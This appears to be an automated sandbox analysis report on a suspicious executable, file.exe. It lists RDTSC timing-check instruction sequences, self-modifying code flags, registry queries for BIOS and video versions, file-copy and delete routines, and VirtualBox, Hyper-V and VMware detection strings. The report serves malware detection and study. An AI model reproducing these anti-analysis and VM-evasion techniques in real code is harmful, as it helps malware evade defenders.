                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14321BD second address: 14321C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B677 second address: 143B6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F65A4502596h 0x0000000c popad 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F65A45025A8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B6A3 second address: 143B6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B6A9 second address: 143B6B1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AEE1 second address: 137AEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AEE7 second address: 137AEF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AEF1 second address: 137AEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B087 second address: 143B090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B090 second address: 143B0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A4C18F9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B0A0 second address: 143B0A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B0A6 second address: 143B0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65A4C18FA4h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B0C2 second address: 143B0C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143B398 second address: 143B3B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CCDB second address: 143CCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CCE1 second address: 143CCEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CCEC second address: 143CCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CCF0 second address: 143CCFC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jng 00007F65A4C18F96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CCFC second address: 143CD0E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65A4502598h 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F65A4502596h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CD0E second address: 143CD37 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65A4C18F96h 0x00000008 jmp 00007F65A4C18F9Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F65A4C18F9Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CD37 second address: 143CD6F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65A4502596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F65A45025B9h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CD6F second address: 143CD75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CD75 second address: 143CD7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143CD7E second address: 143CD82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1449D88 second address: 1449DB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A45025A2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65A45025A4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14497D6 second address: 14497DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14497DC second address: 14497E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14497E0 second address: 14497EA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65A4C18F96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 144E7D7 second address: 144E7DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 144E7DB second address: 144E7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 144E7E3 second address: 144E7E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 144E7E9 second address: 144E803 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 144E803 second address: 144E807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 144E807 second address: 144E811 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 144E811 second address: 144E817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 144E817 second address: 144E825 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 144E825 second address: 144E829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 144E517 second address: 144E51B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 145B7EB second address: 145B7F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F65A4502596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 145B7F5 second address: 145B7F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 145B7F9 second address: 145B805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F65A4502596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 145B805 second address: 145B80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1463CBB second address: 1463CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1463CBF second address: 1463CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1463CC3 second address: 1463D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F65A45025A9h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F65A45025A9h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1463D06 second address: 1463D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1463D0F second address: 1463D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1463E57 second address: 1463E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1463E5D second address: 1463E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1463F95 second address: 1463F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1463F9B second address: 1463FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F65A4502596h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1463FA7 second address: 1463FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 146420C second address: 1464210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1464210 second address: 1464216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1464376 second address: 1464380 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F65A45025A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14774FE second address: 1477506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1477506 second address: 147750A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 147739C second address: 14773CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65A4C18FA3h 0x00000009 jmp 00007F65A4C18FA9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1478C53 second address: 1478C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1478C57 second address: 1478C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14726CB second address: 14726EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F65A45025A9h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14726EE second address: 1472719 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65A4C18F9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F65A4C18FA3h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1485157 second address: 148516E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65A450259Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1484D87 second address: 1484D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F65A4C18F96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1484D91 second address: 1484D9B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65A4502596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1484D9B second address: 1484DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1484DA4 second address: 1484DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1488282 second address: 14882A9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F65A4C18F96h 0x00000014 jmp 00007F65A4C18FA3h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14882A9 second address: 14882AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14882AD second address: 14882B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14960ED second address: 14960F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14963C6 second address: 14963CC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 14963CC second address: 14963D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1496693 second address: 1496699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 149680D second address: 1496812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1496812 second address: 1496822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Bh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1496822 second address: 149683D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F65A450259Bh 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1496A33 second address: 1496A37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1496A37 second address: 1496A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 149994D second address: 1499951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1499B8E second address: 1499B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1499B92 second address: 1499B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 149CCFE second address: 149CD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 149C898 second address: 149C8A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5070271 second address: 5070275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5070275 second address: 5070279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5070279 second address: 507027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 507027F second address: 50702DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F65A4C18FA0h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F65A4C18FA1h 0x00000017 add esi, 7ADD41B6h 0x0000001d jmp 00007F65A4C18FA1h 0x00000022 popfd 0x00000023 mov ebx, eax 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 50702DE second address: 50702E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 50702E4 second address: 5070303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, 3A2AEC20h 0x00000013 push edx 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 507040C second address: 507041B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A450259Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 507041B second address: 5070420 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 1211CBD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13B9222 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13B965D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13B7DAF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 120F606 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13BE89B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FBDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB1160 GetSystemInfo,ExitProcess
Source: file.exe, file.exe, 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1713881816.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW74
Source: file.exe, 00000000.00000002.1713881816.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
Source: file.exe, 00000000.00000002.1713881816.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
